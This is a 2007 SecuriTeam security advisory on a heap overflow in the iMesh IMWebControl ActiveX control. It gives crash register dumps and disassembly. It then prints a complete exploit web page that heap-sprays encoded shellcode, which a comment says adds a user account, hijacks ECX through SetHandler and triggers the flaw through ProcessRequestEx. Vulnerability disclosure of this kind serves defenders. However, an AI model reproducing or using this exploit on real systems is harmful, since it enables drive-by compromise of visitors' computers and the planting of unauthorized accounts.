[NT] iMesh IMWebControl Class Heap Overflow
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 18 Dec 2007 16:32:14 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
iMesh IMWebControl Class Heap Overflow
------------------------------------------------------------------------
SUMMARY
iMesh is "a file sharing and online social network. It uses a proprietary,
centralized, P2P protocol. iMesh is owned by an American company iMesh,
Inc. and maintains a development center in Israel". A vulnerability in the
iMesh ActiveX allows attackers to cause it to overflow a heap buffer
allocated to the product which in turn can be used to execute arbitrary
code.
DETAILS
Vulnerable Systems:
* iMesh version 7.1.0.x and prior (IMWeb.dll 7.0.0.x)
There is a problem with the iMesh client when passing an empty value to
ProcessRequestEx method:
EAX 9F291974
ECX 4D554E00 WINHTTP.4D554E00
EDX 017EF438
EBX 00000000
ESP 017EF410
EBP 017EF430
ESI 017EF438
EDI 01F51FF8
EIP 01F23A9C IMWebCon.01F23A9C
..
01F23A90 8B8F A8000000 MOV ECX,DWORD PTR DS:[EDI+A8]
01F23A96 8B01 MOV EAX,DWORD PTR DS:[ECX]
01F23A98 52 PUSH EDX
01F23A99 8BD6 MOV EDX,ESI
01F23A9B 52 PUSH EDX
01F23A9C FF10 CALL DWORD PTR DS:[EAX] <----- crash
Apparently this was un-exploitable, ecx points to winhttp.dll which keeps
0x9f291974, however rgod found that thru the SetHandler sub you can hijack
ecx to an arbitrary value... So, setting the value to 218959117 you have:
EAX 017EF438
ECX 0D0D0D0D
EDX 017EF43C
EBX 00000000
ESP 017EF418
EBP 017EF430
ESI 017EF438
EDI 01EF1FF8
EIP 01EC3A96 IMWebCon.01EC3A96
..
01EC3A90 8B8F A8000000 MOV ECX,DWORD PTR DS:[EDI+A8]
01EC3A96 8B01 MOV EAX,DWORD PTR DS:[ECX] <------- crash
01EC3A98 52 PUSH EDX
01EC3A99 8BD6 MOV EDX,ESI
01EC3A9B 52 PUSH EDX
01EC3A9C FF10 CALL DWORD PTR DS:[EAX]
Access violation when reading 0D0D0D0D, which is exploitable.
Exploit:
<html>
<object classid='clsid:7C3B01BC-53A5-48A0-A43B-0C67731134B9'
id='IMWebControl' /></object>
<SCRIPT language="javascript">
//add su one, user: sun pass: tzu
shellcode =
unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949%u4949
%u4949%u4949%u4949%u4949%u4949%u5a51%u456a%u5058%u4230%u4231
%u6b41%u4141%u3255%u4241%u3241%u4142%u4230%u5841%u3850%u4241
%u6d75%u6b39%u494c%u5078%u3344%u6530%u7550%u4e50%u716b%u6555
%u6c6c%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f%u4c78
%u414b%u774f%u4450%u4841%u576b%u4c39%u664b%u4c54%u444b%u7841
%u466e%u6951%u4f50%u6c69%u6b6c%u6f34%u3330%u6344%u6f37%u6a31
%u646a%u474d%u4871%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434
%u5835%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b%u624c
%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b%u4c6c%u464b%u7861
%u4f6b%u7379%u516c%u3334%u6b34%u7073%u4931%u7550%u4e34%u536b
%u3470%u4b70%u4f35%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b
%u6550%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b%u4e70
%u5350%u3530%u4350%u6c30%u704b%u3568%u636c%u366f%u4b51%u5146
%u7170%u4d46%u5a59%u6c58%u5943%u6350%u364b%u4230%u7848%u686f
%u694e%u3170%u3370%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f
%u7377%u7053%u426d%u6444%u756e%u5235%u3058%u6165%u4630%u654f
%u3133%u7030%u706e%u3265%u7554%u7170%u7265%u5353%u7055%u5172
%u5030%u4273%u3055%u616e%u4330%u7244%u515a%u5165%u5430%u526f
%u5161%u3354%u3574%u7170%u5736%u4756%u7050%u306e%u7465%u4134
%u7030%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f%u3055
%u6770%u3350%u7071%u3064%u516d%u4279%u324e%u7049%u5373%u5244
%u4152%u3371%u3044%u536f%u4242%u6153%u5230%u4453%u5035%u756e
%u3470%u506f%u6741%u7734%u4734%u4570");
bigblock = unescape("%u9090%u9090");
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<77;i++){memory[i] = block+shellcode}
bigblock = unescape("%u0707%u0707");
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
for (i=77;i<144;i++){memory[i] = block+shellcode}
bigblock = unescape("%u0909%u0909");
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
for (i=144;i<500;i++){memory[i] = block+shellcode}
</script>
<script language='vbscript'>
puf=218959117 'set ecx to 0x0d0d0d0d
IMWebControl.SetHandler puf
puf=""
IMWebControl.ProcessRequestEx puf
</script>
</html>
ADDITIONAL INFORMATION
The information has been provided by <mailto:retrog@xxxxxxxx> rgod.
The original article can be found at:
<http://retrogod.altervista.org/rgod_imesh.html>
http://retrogod.altervista.org/rgod_imesh.html
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Prev by Date: [UNIX] Net::DNS Malformed Packet DoS
- Next by Date: [NT] St. Bernard Open File Manager Heap Overflow Vulnerability
- Previous by thread: [UNIX] Net::DNS Malformed Packet DoS
- Next by thread: [NT] St. Bernard Open File Manager Heap Overflow Vulnerability
- Index(es):
Relevant Pages
|
|
